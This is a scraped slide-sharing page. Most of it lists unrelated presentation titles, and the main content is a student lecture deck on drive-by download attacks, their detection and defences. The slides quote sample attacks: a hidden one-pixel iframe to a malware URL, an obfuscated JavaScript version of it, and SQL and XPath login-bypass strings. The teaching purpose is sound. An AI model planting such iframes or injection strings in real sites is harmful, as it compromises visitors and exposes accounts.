The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 

Dernier (20)

Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptxPasskey Providers and Enabling Portability: FIDO Paris Seminar.pptx
Passkey Providers and Enabling Portability: FIDO Paris Seminar.pptx
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
unit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptxunit 4 immunoblotting technique complete.pptx
unit 4 immunoblotting technique complete.pptx
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software Developers
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embedding
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 

Drive by downloads-cns

  • 1. Drive-By Downloads Presenter: Darakhshan Naz Teacher: Professor Dr. Muhammad Mubashir Khan 04.05.2013 1
  • 2. Agenda  Introduction  Mechanisms of Drive-by Download  General Detection Approach  Security Measures  Assessment & Conclusion 2
  • 3. What is Drive-by Download?  A technique that involves ◦ Intended downloads without understanding consequenes  E.g. Executables ◦ Unintended downloads  E.g. Virus, spyware  Can happen by: ◦ Visiting a website ◦ Viewing an email message  Installs malicious program, termed as Malwares ◦ Through Malwares, attacker gets full or partial control of victim‘s system 3
  • 4. 4 (2) Read email Contains a website link (3) Attract user‘s interest User Click Website has many links (5) Surf every site but getting bored (no interest develop) Close website User Attacker (6) Sends user a spoofed Email User‘s browser (7) Attacker sends malicious code and exploit vulnerability (8) Malicious code creates connection between user and attacker (9) Download and install its backdoor Program (10) Steal all user‘s important files and make him compromised over network Example - Scenario Drive – By Download ! Source of Concept : Report- Defence against Drive-by Download by National Security Agency US User is completely unaware of attack (4) Go to website(1) Open Browser
  • 5. Purpose of Drive-by Download • Provide gateway to botnets. • Take advantages of vulnerabilities. • Steal personal or confidential information of user. • Leads or redirects user to other malicious websites and make him compromised. 5
  • 6. Mechanisms of Drive-by Download 6 Basic Concept of Drive-by Download Attack (Source: [1]) 1 2 43 Injection Exploitation
  • 7. Injection  What is Injection : ◦ The act of entering data into application by bypassing security controls and change its behaviour in unexpected way.  Reason of Injection : ◦ Existance of vulnerabilities.  Drive-by Download initates by the injection of malicious code in database, application or server.  Ways of Malicious code injection: ◦ Injection through iFrames ◦ SQL Injection ◦ XPATH Injection 7
  • 8. How and where to Inject ? 8Source : http://www.malware-info.com/mal_faq_inject.html • SQL Injection • Xpath Injection Injection through iFrames Malware placed directly on Webserver
  • 9. Injection through iFrames  The most basic form of injected code is a malicious iFrame such as:  Example: <div style=visibility: hidden; position: absolute: 1; top:1> <iframe id=IFRAME name=IFRAME src= http://www.example.com/page_with_malware.htm scrolling= no width=1 height=1 vspace=0 hspace=0 frameborder=0> </iframe> </div> 9 This iFrame is present in the HTML of a requested web page Content from this source render in an invisible 1 pixel x 1 pixel window. Sometimes, iFrames present in encoded form that seems normal. The process of encoding is known as "obfuscation“.
  • 10. Obfuscation  The process of disguising code through encoding.  The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.  Encoding tool: http://www.auditmypc.com/html- encoder.asp  On browsing of injected page, the JavaScript dynamically generates an iframe.  This causes malicious content from a website controlled by an attacker to execute inside the requested web page. 10
  • 11. Obfuscation  Obfuscated form of iFrame is : <script type="text/javascript">document.write('u003Cu0064u0069u0076u0020u0073u00 74u0079u006Cu0065u003Du0076u0069u0073u0069u0062u0069u006Cu006 9u0074u0079u003Au0020u0068u0069u0064u0064u0065u006Eu003Bu0020 u0070u006Fu0073u0069u0074u0069u006Fu006Eu003Au0020u0061u0062u 0073u006Fu006Cu0075u0074u0065u003Au0020u0031u003Bu0020u0074u0 06Fu0070u003Au0031u003Eu0020u0020u0020u0020u0020u0020u0020u00 20u0020u0020u0020u003Cu0069u0066u0072u0061u006Du0065u0020u006 9u0064u003Du0049u0046u0052u0041u004Du0045u0020u006Eu0061u006D u0065u003Du0049u0046u0052u0041u004Du0045u000Du0020u0020u0020 u0073u0072u0063u003Du0020u0068u0074u0074u0070u003Au002Fu002Fu 0077u0077u0077u002Eu0065u0078u0061u006Du0070u006Cu0065u002Eu0 063u006Fu006Du002Fu0070u0061u0067u0065u005Fu0077u0069u0074u00 68u005Fu006Du0061u006Cu0077u0061u0072u0065u002Eu0068u0074u006 Du000Du0020u0020u0020u0073u0063u0072u006Fu006Cu006Cu0069u006 Eu0067u003Du0020u006Eu006Fu0020u0077u0069u0064u0074u0068u003D u0031u0020u0068u0065u0069u0067u0068u0074u003Du0031u0020u0076u 0073u0070u0061u0063u0065u003Du0030u000Du0020u0020u0020u0020u0 068u0073u0070u0061u0063u0065u003Du0030u0020u0020u0066u0072u00 61u006Du0065u0062u006Fu0072u0064u0065u0072u003Du0030u003Eu000 Du003Cu002Fu0069u0066u0072u0061u006Du0065u003Eu000Du003Cu002 Fu0064u0069u0076u003Eu000Du000D');</script> 11
  • 12. SQL Injection  Bypass the authentication process.  Provide access of data to malicious user or attacker.  Example : In any userForm page if we enter Username: 'or‘1‘=‘1 and Password: 'or‘1‘=‘1 then webpage will execute this query form SELECT * FROM Users WHERE Username=`1' OR `1' = `1‘ AND Password = `1' OR `1' = `1‘ Parameters have always logical true condition Authentication process is validated and attacker can get access to any account in database. 12
  • 13. XPATH Injection  Almost similar to SQL Injection.  Now “target“ is XML Document.  Insecurity caused by the injection of XPATH query or conditions through webpage.  Example : ◦ If any user has an account in any site with Username=John and Password = test123, then logically he will see his account only. • If same user enters his username like John' or 1 = 1 with same password then system will authenticate him and show the entire XML document to him. 13
  • 14. Mechanism of Drive-by Download 14 Basic Concept of Drive-by Download Attack (Source: [1]) 1 2 43 Injection Exploitation
  • 15. Exploitation  What is Exploitation : ◦ The act by an attacker to perform activities on victim‘s system on his own wish after getting full or partial control.  Reason of Exploitation: ◦ Ignore the updating of installed applications. ◦ According to Secunia PSI, about 95.46% users have one or more insecure applications. ◦ Newer version may correct one or more vulnerabilities in the installed application.  Vulnerabilities that are mostly exploited : ◦ Browser Vulnerability. ◦ Plugin Vulnerability. ◦ File Format Vulnerability. 15
  • 16. Types of Vulnerabilities  Browser Vulnerability ◦ Attacker injects malicious code into user‘s browser and changes its setting without his knowledge.  Plugin Vulnerability ◦ Plugin is provided by third parties that can be vulnerable; may lead to buffer overflows, memory corruption issues and pointer overwrites.  File Format Vulnerability ◦ Attackers attach malware to Word, Excel or PDF files, distributed through email or websites. Exploit will occur when editing program opens them. 16
  • 17. General Detection Approach  Javascript-script based malwares seems difficult to detect and analyze.  Requires a comprehensive approach to detect both root cause and dynamic behaviour.  Specialized Detection Methods: ◦ CUJO[2]  Static + Dynamic analysis of Javascript  Detection through machine learning ◦ ARROW[8].  Create Regular Expression Signatures for servers of MDN.  Evaluate their effectiveness. Here the generalized detection approach will be discussed which is the basic idea to detect. 17
  • 18. Step1: Analysis of JS Redirection  For an effective detection approach, analysis of JavaScript is mandatory. • User is victimized in two ways: • Either he may directly expose to vulnerable site. • Or an attacker reaches to him through a series of redirections.  Two approaches can be taken to investigate redirections. ◦ Implementing some settings into JavaScript code (e.g: document.location). ◦ Taking Browser‘s history. 18
  • 19. Step2: JavaScript Deobfuscation  Most of the malicious JavaScript is in obfuscated (encoded) form.  Deobfuscation (conversion from complex form to simple form) can help to identify malicious code.  It is possible through manually or any automated tool.  Automated Tools : e.g: ◦ Development Tool in Google Chrome. ◦ Microsoft Script Debugger or Editor. 19
  • 20. Step3: Detection of Memory Corruption  Most attacks corrupt the memory.  Attacker tries to enter into browser and run his shellcode. ◦ A shellcode is a small code through which attacker gets control of victim‘s system. • Attacker then uses JavaScript to allocate large number of strings for the shellcode. • These strings are not the part of real code but for memory allocation by the attacker. • Detection of these strings can give the indication of shellcode. 20
  • 21. Contd.  Detection of these strings can be done through two ways: ◦ Controlling and maintaining of string variables whenever they are created. ◦ For automated detection, libemu library is used.  It searches from each character and when it finds a sequence of valid instructions, it reports shellcode. 21
  • 22. Step4: Investigation of Exploitation  Exploitation is last step of Drive-by Download attack that take advantage of vulnerabilities.  It can be detected through two ways : ◦ Analysis of behaviours of Browsers and Plug-ins ◦ Monitoring of string passing as parameters and method calls. Usually long strings are used in exploits and certain methods are called in malware downloading. 22
  • 23. Security Measures  Updation of softwares.  Installation of web-filtering softwares.  Implementation of BLADE(Block All Drive-by Download Exploits).  Proper management by Network Administrators.  Users should be careful while visiting sites specially entertainment and social sites as they may have Adversaries.  Usage of reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.  Usage of Virtual Machine for Web Browsing. 23
  • 24. The Good  Automated techniques (compiler or library) of deobfuscation is really helpful for the identification of malicious JavaScript.  Detection should be focussed on central points. ◦ Evilseed[11] provides a crawling approach focussing on central points of Malware.  Machine Learning can provide light weight Javascript analysis, fast detection mechanisms and handling of vulnerabilities in runtime.  Proper input validations can reduce SQL and XPATH injection. 24
  • 25. The Bad  Can easily happen but very hard to overcome.  Possibilities of attack are rapidly increasing but validity of detection approaches is not possible every time.  Defensive approach is better to fight against these attacks because of two reasons : ◦ Intense Dynamic behaviour. ◦ Complex and time consuming detection approaches. 25
  • 26. The Ugly  Mostly show unexpected behaviour.  Due to diversity of different ways of attack, it has high ratio of victims and it is difficult to design a detection approach that covers all possibilities.  Not any computing device seems to be safe from Drive-by Download.  As Drive-by Download attack is increasing enormously, perhaps in near future, hard drives or portable device vulnerabilities may also exist. 26
  • 27. Thanks for your attention 27
  • 28. References(1) [1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009). [2] Rieck, K., Krueger, T., Dewald, A.: CUJO-Ecient Detection and Prevention of Drive-by Download Attacks, Tecnische Universitaet Berlin. [3] Stone-Gross, B., Cova M. , Kruegel, C. , Vigna, G.: Peering through the iFrame University of California, University of Birmingham. [4] Westervelt, R.: Kaspersky website hacked (February 2009). [5] Cova, M. , Kruegel, C., Vigna G.: Detection and Analysis of Drive-by-Download Attacks andMalicious Javascript Code University of California, Santa Barbara From ACM digital library. [6] Interesting statistics from the Secunia PSI (January 2008) http://secunia.com/blog/18. 28
  • 29. References(2) [7] Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack- Agnostic Approach for Preventing Drive-By Malware Infections College of Computing, Georgia Institute of Technology, SRI International From ACM digital library. [8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW: Generating Signatures to Detect Drive-By Downloads Georgia Institute of Technology, Microsoft Bing, Microsoft Research [9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers Indian Institute of Technology, Guwahati, India. [10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.: All your Iframes point to us Google Inc., Johns Hopkins University. [11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Krueg el, C., Vigna,G.:EVILSEED: A Guided Approach to Finding MaliciousWeb Pages, 2012 IEEE Symposium on Security and Privacy 29